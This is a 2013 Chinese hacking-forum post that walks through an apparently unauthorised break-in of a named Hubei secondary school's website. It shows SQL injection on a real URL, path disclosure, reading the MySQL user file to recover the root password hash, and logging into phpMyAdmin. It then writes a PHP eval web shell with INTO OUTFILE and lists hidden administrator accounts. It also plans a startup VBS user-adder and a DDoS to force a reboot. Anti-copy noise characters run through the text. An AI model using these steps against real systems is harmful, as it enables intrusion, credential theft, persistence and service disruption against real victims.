找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2732|回复: 1
打印 上一主题 下一主题

友情检测湖北省大治市第一中学

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:32:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏5 y" _) K# l4 I1 {, w! B7 C
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入!
3 }; j1 G4 j/ t6 S, }5 `" G8 |* O
3 N$ i0 [+ S4 y. Q. \

  m6 p; j% W8 T2 K常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 , W5 q; G8 V7 ?8 z" ~) C' L
! ?/ e4 d$ H$ e8 E5 N- ~
那么想可以直接写入shell ,getshell有几个条件:
2 G/ ~3 D# F! z% d- V6 }
1、知道站点物理路径
2、有足够大的权限
3、magic_quotes_gpc()=OFF
, l6 d* D" _! w+ ^3 [
8 H3 E. U/ q7 b, R. a试着爆绝对路径:
, E  v8 z* m# o' Q1./phpMyAdmin/index.php?lang[]=1  
9 L: i# X; y' k6 R5 z2./phpMyAdmin/phpinfo.php  & ?; f+ I0 I4 |4 v& O# E/ V& o
3./load_file()  9 ~- D; s: R- H( y
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  / z  k  ?2 I1 g4 t( X' C2 |
5./phpmyadmin/libraries/select_lang.lib.php  
# i. O- a7 J# _% W6 H4 G) x6./phpmyadmin/libraries/lect_lang.lib.php  . u9 Q9 o8 C$ n5 V$ k& N# E( E
7./phpmyadmin/libraries/mcrypt.lib.php   
  e; ^9 q! B6 E: r- C' {8./phpmyadmin/libraries/export/xls.php  0 \  _% u3 Y9 \- {
4 P5 q% f5 c- o' U2 {
均不行...........................
8 k6 ~. N6 c6 |8 n& O  {4 _/ r. B5 m, C: U  p! w
御剑扫到这个:http://www.dyyz.net.cn//phpinfo.php       获得网站路径:D:/www/phpinfo.php
  M# U; u. \# C# Y+ l, l, u: G) ~  S4 |4 ~1 R
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
7 I( A( A5 ~7 [3 L7 p' ~
, k7 e: s) u/ z' e, ?默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
4 j. q6 a/ ~* y* ]6 Q  g% g) y4 w0 F. N. x% [
敏感东西:http://202.103.49.66/Admincp.php  社工进不去...........# v+ Q# O* M0 G% G4 j/ T- i; k
# g. L* ]! K  o! i
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell : h8 n8 m! j/ r1 m
* r' e6 D" Y0 m" K: e6 g' G
http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini ) f/ B. u# R) Z# ^* ~+ C% h

! g& n7 ^" A* Q/ b自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
* a) o; l  q; W* c( a# q% S
1 h) T$ ]  A/ u4 N成功读到root密码:9 t) E% u; B& Y& U, J
) W3 u6 M0 C' x0 }- F
17---- r(0072)
1 e$ E9 g' W5 t; s8 x- O5 H7 q18---- o(006f)
5 c  K# z' o  U/ L6 [0 K4 D% X. k19---- o(006f)
. e6 t7 Y4 \8 \3 Y: _20---- t(0074)
8 _7 j: g! ~  ]21---- *(002a)
8 S0 o: d1 X# |+ e22---- 8(0038)
" [* l1 v6 I! O7 _23---- 2(0032)+ \( ?/ q; B+ R4 C$ [
24---- E(0045)7 ?) e1 K# p' x6 G# S& E6 B/ W% M
25---- 1(0031)
) d1 u7 B0 b$ J1 D; B4 Y26---- C(0043)2 w0 x( g4 f; k; u0 w; Y
27---- 5(0035)1 |* i0 P( I1 \% O* y
28---- 8(0038)
8 o& E4 M9 p' r( g* b1 W4 s4 e29---- 2(0032)
* B1 b: o+ W& O9 I: Q30---- 8(0038)
( i8 W0 E& X) }31---- A(0041)& q1 v; W( t$ P7 `: V& F+ ]: t
32---- 9(0039)
; \( X0 b, t: \33---- B(0042), z5 M! J1 k& Q1 Y
34---- 5(0035): B) T) q) q: @1 q5 f: z
35---- 4(0034)
& K8 u# @. x, W4 Z2 M  r8 v36---- 8(0038)
. J+ Q! E+ e6 L# B37---- 6(0036)
9 Z: G1 R. e% a38---- 4(0034)( }0 v7 r$ W: U
39---- 9(0039)4 ^0 a+ c* J' Y3 N
40---- 1(0031)2 R5 G# V+ j/ `3 _: A
41---- 1(0031)$ |4 N3 R3 Y* Q* _1 O* H. k
42---- 5(0035)( j: A4 b- T2 b
43---- 3(0033)
1 ?2 ?/ H9 p  o- _2 l  ^44---- 5(0035)
" n5 @, L9 ?3 A: O1 `: }) Z# `! q45---- 9(0039)
( O: b- L3 h0 e46---- 8(0038)4 q1 l6 n9 a% N' d, g4 f( D/ z
47---- F(0046)
" h2 I9 |8 q4 H6 u& _48---- F(0046)
# Z4 T* m. m) Z4 o. y+ N9 m+ U49---- 4(0034)$ G/ \& H0 `( P. G6 k' B5 A
50---- F(0046); d% P5 l# i" x" V% K9 y$ w: h
51---- 0(0030). M- k* V- L; Y; o3 |
52---- 3(0033)  x. D1 l& p# Z, N. @8 ~! }+ T; T# E
53---- 2(0032)
- k/ n! D  e7 s1 q: x54---- A(0041)5 L7 c& {5 I5 U6 L7 n# S& V0 j# `
55---- 4(0034)
4 [) P# f  N. ]7 D  K56---- A(0041)
% X: ?( l% e* ~, U* `: P4 {/ A57---- B(0042)- m! \! M4 P/ d3 y
58---- *(0044)
$ ]/ K1 I7 ^4 u5 g1 C+ u/ w4 V2 R59---- *(0035)1 I/ M, a, ~# w( G; j3 I
60---- *(0041)
9 b: w4 Y# r* ^% Q. J61---- *0032)# v- c- g, ]0 W; q' U

& c+ }" q1 S( q+ n( ^4 z; B解密后成功登陆phpmyamin
* s  x9 I4 E1 f. F5 N9 V                          
& U) Y" V/ b1 E7 D! C. c, f
7 _) W: |. P: u- V9 q- a5 k% l0 ]                             
) T5 o, d: M' Q  t/ h0 e
( `- s' s% A4 W, z找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'* Z" ?5 ?  B, o

6 K4 q% h: L3 D. }6 P- t% z) @成功执行,拿下shell,菜刀连接:
3 N3 x" Y# R; G* ~. b
; A  y! P5 z- z6 R服务器不支持asp,aspx,php提权无果...................
# I: d* `$ m' v8 n: }( [6 J  g6 R1 [0 _' k0 h, Z
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
0 y: g) p" e+ I5 H0 B! T7 [/ |
服务器上已经有个隐藏帐号了
5 Y% O. P) V& E% d, y
别名     administrators* i4 Y( g! D- N& y8 C+ G' G
注释     管理员对计算机/域有不受限制的完全访问权
9 V! H4 F7 D, h  o6 y
成员
* Y' g: J/ t, g1 R
-------------------------------------------------------------------------------
2 F! d' ^6 M  g+ {: \admin
3 T/ n8 ~1 D8 {  C6 m0 SAdministrator  v0 T9 r. s& U4 J1 z1 C, e% r
slipper$1 J/ P1 D: D0 ], K8 j3 |0 }
sqluser
, R! N' ]' ]3 u命令成功完成。 ( P) _, Y' L" ?) M, y6 K% _: x
8 U0 p  S! a* b  y1 e
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。5 e5 P4 w4 S. p  \% G

  ?1 M3 Q, F' `ddos服务器重启,不然就只能坐等服务器重启了...............................
# q+ ?3 m. z+ L, ]9 W2 E0 A7 z0 K# J" j  m' O* c# H) W
      
. [/ V4 W, G! J

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2013-5-20 15:28:12 | 只看该作者
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表